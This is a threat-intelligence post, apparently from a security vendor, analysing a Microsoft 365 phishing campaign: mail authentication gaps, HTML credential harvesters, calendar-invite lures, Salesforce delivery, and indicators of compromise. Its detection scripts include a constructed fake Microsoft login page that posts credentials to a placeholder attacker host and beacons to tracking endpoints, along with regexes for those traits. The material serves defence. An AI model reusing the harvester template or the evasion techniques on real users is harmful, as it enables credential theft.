Microsoft 365 Credential Harvesting Campaign observed in Salesforce workflows

WithSecure Cloud Protection for Salesforce has identified an active phishing campaign targeting Microsoft 365 users that extends beyond traditional email delivery.

Phishing attacks are no longer confined to the inbox.

By combining legitimate Microsoft 365 infrastructure, HTML-based credential harvesting, and calendar invite abuse, this campaign achieves high delivery success and multiple opportunities for user interaction.

Notably, this activity was also observed propagating through Salesforce workflows, introducing a trusted business context that can further reduce user suspicion.

Key takeaways

  • Attackers leveraged Microsoft 365 infrastructure to improve phishing email deliverability
  • HTML attachments delivered credential-harvesting pages impersonating Microsoft services
  • Calendar invites (ICS files) introduced a secondary interaction channel
  • The campaign was observed within Salesforce workflows, where business context increases user trust
  • The attack relies on abusing trusted platforms and user interaction rather than exploiting vulnerabilities

Timeframe and Scope

The earliest confirmed activity dates to September 2025, with the campaign still active as of today, 17 April 2026.

Most observed telemetry is concentrated in US-based organizations, with additional activity identified across Europe and other regions. Target organizations span multiple sectors, including legal services, financial services, manufacturing, education, and consumer goods.

The distribution of targets suggests an opportunistic campaign, rather than one focused on specific industries or geographies.

Social engineering lures

The campaign uses multiple convincing themes:

Domain expiry / renewal failure — urgent warnings of service disruption

Microsoft subscription payment failure — billing issues affecting service continuity

Payroll report delivery — impersonation of internal payroll communications

SharePoint file sharing — fake collaboration requests

Academic invitations — targeted institutional messaging

Example phishing email

These lures rely on urgency or contextual authority to drive immediate action.

Email authentication evasion

The campaign achieves delivery by operating within the constraints of email authentication rather than bypassing them outright.

The sending domains were configured with the following SPF record:

v=spf1 include:spf.protection.outlook.com ~all

This configuration has several implications:

  • Microsoft 365 infrastructure is explicitly authorized to send on behalf of the domain
  • The ~all (softfail) qualifier asks receivers to accept but flag mail from any other source, so an SPF failure on its own does not stop delivery
  • No DMARC record is published, so there is no domain-owner policy to enforce and the decision falls back to each receiving system

This is the SPF result for one of the sender IPs observed in the email headers:

Sender IP (146.20.65.91) fails SPF authentication for the domain, yet the email was still delivered due to the softfail policy and DKIM pass.

In observed samples, the sending IP failed SPF validation, but the message was still delivered because:

  • DKIM validation succeeded (the attacker controls the signing domain)
  • No DMARC policy enforced rejection
  • The composite authentication verdict, which weighs SPF, DKIM and DMARC together, came out acceptable to the filtering stack

This shows that passing authentication checks does not indicate legitimacy; it only means that the message conforms to the authentication model. A stricter policy on these domains would not have changed the outcome either: the attacker controls them and signs with an aligned DKIM key, so the messages would pass DMARC even under p=reject. SPF, DKIM and DMARC establish who controls a domain, not whether that domain can be trusted.
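
The decision logic behind the delivery outcome described above, as an added example (not code from the post): it parses a constructed Authentication-Results header of the shape Exchange Online writes (the domain is a placeholder, the IP is one listed in this post), reads the qualifier on the SPF `all` term, and applies the DMARC alignment rule from RFC 7489 to three cases: the domain as observed with no DMARC record, the same attacker-controlled domain with p=reject, and an attempt to spoof a third-party domain that enforces p=reject.

```python
"""SPF qualifier, Authentication-Results parsing and the DMARC decision.

Added example. The header below is constructed; the domain is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE_AUTH_RESULTS = (  # constructed, modelled on the observed verdicts
    "spf=softfail (sender IP is 146.20.65.91) smtp.mailfrom=example-attacker.test; "
    "dkim=pass (signature was verified) header.d=example-attacker.test; "
    "dmarc=none action=none header.from=example-attacker.test; compauth=pass reason=109"
)

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_all_qualifier(record: str) -> str:
    """Result an SPF evaluator returns for an IP that matches no mechanism.
    '~all' yields softfail (accept and mark); '-all' yields fail."""
    for term in record.split():
        if term.lstrip("+-~?").lower() == "all":
            return QUALIFIERS.get(term[0], "pass")  # bare 'all' means '+all'
    return "neutral"  # no 'all' term: RFC 7208 default result


@dataclass
class AuthResults:
    spf: str
    mailfrom: str
    dkim: str
    dkim_domain: str
    from_domain: str


def parse_auth_results(header: str) -> AuthResults:
    """Extract each method's verdict and the domain it was evaluated against."""
    def grab(pattern: str) -> str:
        m = re.search(pattern, header, re.I)
        return m.group(1).lower() if m else ""
    return AuthResults(
        spf=grab(r"\bspf=(\w+)"),
        mailfrom=grab(r"smtp\.mailfrom=([\w.-]+)"),
        dkim=grab(r"\bdkim=(\w+)"),
        dkim_domain=grab(r"header\.d=([\w.-]+)"),
        from_domain=grab(r"header\.from=([\w.-]+)"),
    )


def org_domain(domain: str) -> str:
    """Approximate organizational domain (last two labels). Real DMARC uses the
    Public Suffix List; this is enough for the example."""
    return ".".join(domain.split(".")[-2:])


def dmarc_disposition(r: AuthResults, policy: Optional[str]) -> str:
    """'none' when the From domain publishes no DMARC record; otherwise 'pass'
    if SPF or DKIM passed on a domain aligned with the From domain, else the policy.
    Note that SPF softfail is not a pass, so DKIM carries the whole decision here."""
    if policy is None:
        return "none"
    spf_ok = r.spf == "pass" and org_domain(r.mailfrom) == org_domain(r.from_domain)
    dkim_ok = r.dkim == "pass" and org_domain(r.dkim_domain) == org_domain(r.from_domain)
    return "pass" if (spf_ok or dkim_ok) else policy


def campaign_scenarios() -> dict:
    """The observed case, the same domain under p=reject, and a spoof of a third party."""
    observed = parse_auth_results(SAMPLE_AUTH_RESULTS)
    spoofed = AuthResults(spf="softfail", mailfrom="example-attacker.test", dkim="pass",
                          dkim_domain="example-attacker.test", from_domain="victim-brand.example")
    return {
        "observed_no_dmarc_record": dmarc_disposition(observed, None),
        "attacker_domain_with_p_reject": dmarc_disposition(observed, "reject"),
        "spoofed_third_party_with_p_reject": dmarc_disposition(spoofed, "reject"),
    }


if __name__ == "__main__":
    print(spf_all_qualifier("v=spf1 include:spf.protection.outlook.com ~all"))
    for case, result in campaign_scenarios().items():
        print(f"{case}: {result}")
```

The third scenario is the one DMARC is designed for: the same attacker signature fails alignment against someone else's From domain and p=reject applies. Against the attacker's own domain the aligned DKIM pass wins regardless of policy, which is why the post's point about "conforming to the model" matters for filtering logic.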

M365 Tenant Abuse

The phishing emails were routed through Microsoft 365 tenant infrastructure.

Attackers likely registered or acquired tenants via free trials, compromised accounts, or underground markets, and used them to send messages through legitimate Microsoft infrastructure.

Microsoft-generated header fields observed in the emails identify the authenticated tenant associated with the sending session. Exchange Online stamps these fields itself as the message transits Microsoft infrastructure, so an external sender cannot supply them; their presence confirms the use of genuine tenant infrastructure.

Example Tenant ID used by threat actor

Email attachments: dual delivery approach

Each phishing email contains two attachments:

  • HTML file — primary credential harvesting payload
  • iCalendar (.ics) file — secondary delivery vector

This dual-delivery approach increases resilience against single-channel defenses and creates multiple interaction paths for the recipient.

HTML Attachment: Credential Harvester

The HTML attachment presents a fake Microsoft login experience.

When opened, it:

  • Displays a Microsoft-branded loading sequence
  • Dynamically generates attacker-controlled subdomains
  • Loads a phishing interface designed to capture credentials

Fake loading process

Fake login prompt

In addition to generic Microsoft-themed pages, some HTML attachments are tailored to specific scenarios, including domain renewal or subscription notices impersonating providers such as GoDaddy.

Fake GoDaddy login page

This phishing kit also tracks user interaction by issuing requests to attacker-controlled endpoints over non-standard ports (e.g., 8443, 2083), using URL paths such as /impact and /track-click. This allows the operators to monitor engagement and potentially tailor subsequent stages of the attack.

Tracking endpoint URL format
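
A static check for the harvester traits described in this section (Microsoft branding, a credential form, a dynamically generated subdomain, beacons on ports 8443/2083 with /impact and /track-click paths), as an added example rather than WithSecure's PHISH/HTML.Agent detection. Both HTML documents in the block are constructed for the example: the first imitates the described behaviour with placeholder hostnames, the second is a harmless control that should not trigger.

```python
"""Heuristic scan of an HTML attachment for credential-harvester traits.

Added example; the sample documents are constructed and the heuristic
weights are a judgement call, not a published detection.
"""
import re

SAMPLE_HARVESTER = """<!doctype html>
<html><head><title>Sign in to your account</title></head>
<body>
<div id="loader"><img alt="Microsoft" src="logo.png"><p>Loading Office 365 ...</p></div>
<form id="login" method="post">
  <input type="email" name="login" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
<script>
  var sub = Math.random().toString(36).substring(2, 10);
  var host = "https://" + sub + ".example-kit.test";
  fetch(host + ":8443/track-click?e=" + encodeURIComponent(location.href));
  document.getElementById("login").action = host + ":2083/impact";
</script>
</body></html>
"""

SAMPLE_BENIGN = """<html><body><h1>Team newsletter</h1>
<p>The quarterly figures are attached as a PDF.</p></body></html>
"""

# name -> (regex, weight)
HEURISTICS = {
    # a login form inside an attachment is the core of the technique
    "password_field": (re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I), 1),
    "microsoft_brand": (re.compile(r"\b(?:microsoft|office\s?365|outlook|sharepoint|onedrive)\b", re.I), 1),
    # a random value feeding a string that starts a URL: the dynamic-subdomain trick
    "dynamic_subdomain": (re.compile(r"Math\.random\(\)[\s\S]{0,200}?[\"']https?://[\"']\s*\+"), 2),
    # beacon/exfil endpoints on the non-standard ports and paths seen in the campaign
    "tracking_endpoint": (re.compile(r":(?:8443|2083)/|/(?:impact|track-click)\b"), 2),
    "obfuscation": (re.compile(r"\b(?:atob|unescape|String\.fromCharCode)\s*\("), 1),
}


def scan_html(html: str) -> dict:
    """Return the triggered heuristics, a weighted score and a verdict."""
    hits = [name for name, (rx, _) in HEURISTICS.items() if rx.search(html)]
    score = sum(HEURISTICS[name][1] for name in hits)
    if "password_field" in hits and score >= 4:
        verdict = "likely credential harvester"
    elif score:
        verdict = "needs review"
    else:
        verdict = "clean"
    return {"hits": hits, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for label, doc in (("harvester", SAMPLE_HARVESTER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(doc))
```

The verdict deliberately requires the password field plus at least one high-weight behaviour (dynamic hostname or tracking endpoint), since brand strings alone appear in plenty of legitimate mail. Kits that build the endpoint from base64 or character codes would only surface through the obfuscation heuristic, which is why it is scored rather than ignored.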

Calendar Invite: Secondary Delivery Vector

The iCalendar (.ics) attachment is delivered as a meeting request.

Because ICS is widely supported across platforms (Outlook, Google Calendar, Apple Calendar, and mobile clients), it provides a reliable cross-platform delivery mechanism.

Depending on email client behavior and configuration:

  • Events may be automatically added to the calendar
  • Events may appear upon preview or interaction
  • Users may engage without explicitly accepting the invite

Calendar invite

Calendar invite added to calendar

The ICS attachment itself does not contain executable malicious content. Instead, it functions as a social engineering and delivery mechanism, guiding the user toward the phishing payload.

Observed in Salesforce workflows

We have observed this campaign within Salesforce workflows. This is significant because Salesforce operates within a trusted business context, where users expect legitimate operational content. Content appearing in CRM workflows aligns with expected business activity, which can reduce user skepticism.

In this context:

  • Phishing content appears consistent with legitimate workflows (e.g., invoices, payroll, document sharing)
  • The delivery channel reinforces perceived legitimacy
  • The attack may fall outside traditional email-focused threat models

The phishing payload itself behaves the same regardless of delivery channel. However, delivery through Salesforce increases the likelihood of user interaction due to contextual trust.

Detection

WithSecure Cloud Protection for Salesforce detects the malicious HTML attachments associated with this campaign as PHISH/HTML.Agent.

This detection targets credential-harvesting pages that:

  • Dynamically generate attacker-controlled URLs
  • Impersonate Microsoft authentication portals
  • Capture user credentials

Conclusion

This campaign demonstrates how attackers increasingly operate within trusted systems rather than attempting to evade them directly.

This approach reduces reliance on traditional evasion techniques and instead exploits trust in widely adopted platforms.

By combining these techniques, the attackers create messages that appear technically legitimate:

  • Legitimate Microsoft 365 infrastructure
  • Weak or absent DMARC enforcement
  • Valid DKIM signatures
  • Multi-channel delivery (email and calendar)

The observation of this activity within Salesforce workflows highlights a broader shift: phishing threats are no longer limited to email but are extending into business applications where users inherently trust the context.

As attackers continue to leverage trusted platforms and workflows, organizations that focus solely on email security risk overlooking exposure in systems that are deeply embedded in day-to-day operations.

Recommendations

  • Treat urgent service-related emails and calendar invites with caution
  • Avoid opening HTML attachments claiming to be Microsoft login portals
  • Access Microsoft services directly via official domains
  • Review calendar auto-acceptance settings
  • Do not rely solely on SPF/DKIM/DMARC results as indicators of trust

Indicators of compromise

The following indicators were identified through analysis of the campaign samples.

Note that infrastructure indicators (IPs, domains, tenant IDs) are subject to rotation by the attackers.

  • M365 Tenant IDs:
    • 6449efea-a175-42ba-b4fe-aaf702600f14
    • 7c8f16fe-b88a-438e-850b-cc8160aefa6d
    • d87ee9b3-0568-4108-9977-1462d082e09b
    • 0714db3d-882f-41c4-8579-3146af5c2abb
  • IP addresses:
    • 146.20.65.91
    • 146.20.87.4
    • 31.58.144.13
  • Domains:
    • anaksakti77[.]org
    • touchepasamonflic[.]fr
    • klinikdrdewi[.]com
    • haoranchalerkotha[.]com
    • khaskhoborbd[.]com
    • bhkbbmta110[.]com
    • cash4d10[.]xyz
    • blitz168asia[.]com
    • blitz168app[.]com
    • walshmanagement[.]ca
    • doctorsbusinesshub[.]com
    • anaksakti[.]online
    • automedsos[.]com
    • richalfahad[.]com
    • bishalacademy[.]com
    • uttarabusinessclub[.]com
    • cloudeducation[.]xyz
    • nexgenictchampsolympiad[.]com
    • 102naga26[.]com
    • igromaster[.]info
    • n8nblitz[.]sbs
    • waroengindo89[.]com
    • ytccomputer[.]com
    • css.nokhbabd[.]com
  • Filename patterns:
    • Admin_Center_MSA[username]_[digits]_.htm
    • Admin_Center_[name]_[digits]_.htm
    • Online admin center [random].PDF.HTM
    • SharePoint_Workspace_Team_review, [timestamp]-[digits].htm
    • Ms-Portal-SupportHub_[encoded].htm
    • TUlNRS1WZXJzaW9uOiAxLjAKQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw (base64 decodes to “MIME-Version: 1.0\nContent-Type: text/html”)
    • Remittance_Review_[string].htm
    • PayOps Asset Ltd – RTI Full Payment Submission (FPS) for [month]_[random].htm
    • ABH Asset Ltd – RTI Full Payment Submission (FPS) for [month]_[random].htm
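
A message-level triage script that ties the tenant-abuse, dual-attachment and calendar-invite sections to this indicator list, as an added example (not WithSecure's detection logic). It builds a constructed .eml in-process so it runs offline: the tenant ID and sender IP are taken from the list above, the domains and the harvester body are placeholders. It reads the sending tenant from X-MS-Exchange-CrossTenant-Id, the header Exchange Online stamps on mail it transports (taking that as the field the post refers to is an assumption of this example), extracts the SPF/DKIM/DMARC verdicts and sender IP from Authentication-Results, matches attachment names against the filename patterns, and unfolds the ICS invite to pull out the URL the lure points at.

```python
"""Triage one message against the indicators in this post. Added example;
the sample message, domains and attachment bodies are constructed."""
import email
import re
from email import policy
from email.message import EmailMessage

TENANT_IOCS = {
    "6449efea-a175-42ba-b4fe-aaf702600f14", "7c8f16fe-b88a-438e-850b-cc8160aefa6d",
    "d87ee9b3-0568-4108-9977-1462d082e09b", "0714db3d-882f-41c4-8579-3146af5c2abb",
}
IP_IOCS = {"146.20.65.91", "146.20.87.4", "31.58.144.13"}

# Filename patterns from the IOC list as regexes (Admin_Center_MSA... is covered by the first).
FILENAME_PATTERNS = [re.compile(p, re.I) for p in (
    r"^Admin_Center_.+_\d+_\.htm$",
    r"^Online admin center .+\.PDF\.HTM$",
    r"^SharePoint_Workspace_Team_review, .+-\d+\.htm$",
    r"^Ms-Portal-SupportHub_.+\.htm$",
    r"^TUlNRS1WZXJzaW9uOiAxLjAKQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw",
    r"^Remittance_Review_.+\.htm$",
    r"^(?:PayOps|ABH) Asset Ltd .+RTI Full Payment Submission \(FPS\) for .+\.htm$",
)]

# Constructed invite; DESCRIPTION is folded per RFC 5545 (CRLF + space) to exercise unfolding.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
METHOD:REQUEST
BEGIN:VEVENT
UID:sample-1@example-attacker.test
DTSTART:20260417T090000Z
ATTENDEE;RSVP=TRUE:mailto:user@victim.example
SUMMARY:Action required: subscription payment
DESCRIPTION:Your payment failed. Review the notice at https://login.examp
 le-attacker.test/impact before the deadline.
END:VEVENT
END:VCALENDAR
"""


def build_sample_eml() -> bytes:
    """Constructed message with the dual HTML + ICS delivery (not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "billing@example-attacker.test"
    msg["To"] = "user@victim.example"
    msg["Subject"] = "Microsoft 365 subscription payment failed"
    msg["X-MS-Exchange-CrossTenant-Id"] = "6449efea-a175-42ba-b4fe-aaf702600f14"
    msg["Authentication-Results"] = (
        "spf=softfail (sender IP is 146.20.65.91) smtp.mailfrom=example-attacker.test;"
        " dkim=pass header.d=example-attacker.test;"
        " dmarc=none action=none header.from=example-attacker.test"
    )
    msg.set_content("Your subscription payment failed. See the attached notice.")
    msg.add_attachment("<html><body>placeholder for the harvester page</body></html>",
                       subtype="html", filename="Admin_Center_MSAuser_20251103_.htm")
    msg.add_attachment(SAMPLE_ICS, subtype="calendar", filename="invite.ics")
    return msg.as_bytes()


def extract_ics_urls(ics_text: str) -> list:
    """Unfold continuation lines, then collect URLs from the properties a lure sits in."""
    unfolded = re.sub(r"\r?\n[ \t]", "", ics_text)
    urls = []
    for line in unfolded.splitlines():
        prop = line.split(":", 1)[0].split(";", 1)[0].upper()  # drop params like ;RSVP=TRUE
        if prop in ("SUMMARY", "DESCRIPTION", "LOCATION", "URL"):
            urls += re.findall(r"""https?://[^\s"'<>\\]+""", line)
    return urls


def triage(raw: bytes) -> dict:
    """Pull header and attachment facts out of one message and decide on a verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    auth = str(msg.get("Authentication-Results", ""))

    def field(pattern: str) -> str:
        m = re.search(pattern, auth, re.I)
        return m.group(1).lower() if m else ""

    tenant_id = str(msg.get("X-MS-Exchange-CrossTenant-Id", "")).strip().lower()
    sender_ip = field(r"sender IP is\s+([\d.]+)")
    spf, dkim, dmarc = field(r"\bspf=(\w+)"), field(r"\bdkim=(\w+)"), field(r"\bdmarc=(\w+)")

    html, ics, matched, ics_urls = [], [], [], []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ctype = part.get_content_type()
        if ctype == "text/html" or name.lower().endswith((".htm", ".html")):
            html.append(name)
        if ctype == "text/calendar" or name.lower().endswith(".ics"):
            ics.append(name)
            ics_urls += extract_ics_urls(part.get_content())
        if any(p.match(name) for p in FILENAME_PATTERNS):
            matched.append(name)

    reasons = []
    if tenant_id in TENANT_IOCS or sender_ip in IP_IOCS:
        reasons.append("known tenant or sender IP")
    if spf == "softfail" and dkim == "pass" and dmarc == "none":
        reasons.append("SPF softfail carried by DKIM pass with no DMARC record")
    if html and ics:
        reasons.append("dual html+ics delivery")
    if matched:
        reasons.append("attachment filename matches campaign pattern")
    return {"tenant_id": tenant_id, "sender_ip": sender_ip, "spf": spf, "dkim": dkim,
            "dmarc": dmarc, "html_attachments": html, "ics_attachments": ics,
            "matched_filenames": matched, "ics_urls": ics_urls, "reasons": reasons,
            "verdict": "suspicious" if reasons else "no campaign indicators"}
```

To run it against real mail, pass the raw bytes of an exported .eml to triage() instead of build_sample_eml(). The tenant and IP sets are the volatile part (the post notes they rotate), while the attachment shape and the ICS URL extraction keep working when the infrastructure changes.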